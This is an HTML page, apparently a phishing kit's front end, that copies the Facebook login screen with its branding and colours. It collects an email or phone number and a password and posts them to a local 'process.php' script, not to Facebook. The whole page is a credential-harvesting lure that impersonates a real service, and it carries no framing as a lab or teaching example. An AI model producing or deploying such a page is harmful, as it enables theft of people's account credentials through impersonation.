<!DOCTYPE html>
<html>
<style>

h1 {
  font-family: tahoma,verdana,arial,sans-serif;
  font-size: 38px;
  letter-spacing:0.05px;
  margin: 0;
  color:#fff;
  -webkit-font-smoothing: antialiased;
  padding-top:80px;
}

form{
	font-size:20px;	
}

input{
    width:200px;
	height:20px;
	}


h1{
	font-size:70px;
	padding:20px;
	padding-top:60px;
	}


body{ width: 100%;
	height: 100px;
	color:white;
	background-color: #3b5998
	}
	

	
	
button{
  margin-top:20px;
  background-color: #5b72a9;
  border: 1px solid #999;
  cursor:pointer;
  font-size:18px;
  font-weight:bold;
  text-align:center;
  color:#fff;
}	
	
	
</style>
<head>

</head>
<body>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<center><h1>facebook</h1><center>

<form method="post" action="process.php">
  Email or Phone<br>
  <input type="text" name="username"><br>
  Password<br>
  <input type="password" name="password">
  <center><button  type="submit" value="Submit">login and  <img src="like.png" style="width:20px;height:20px;"></button></center>
</form>
  

</body>
</html>
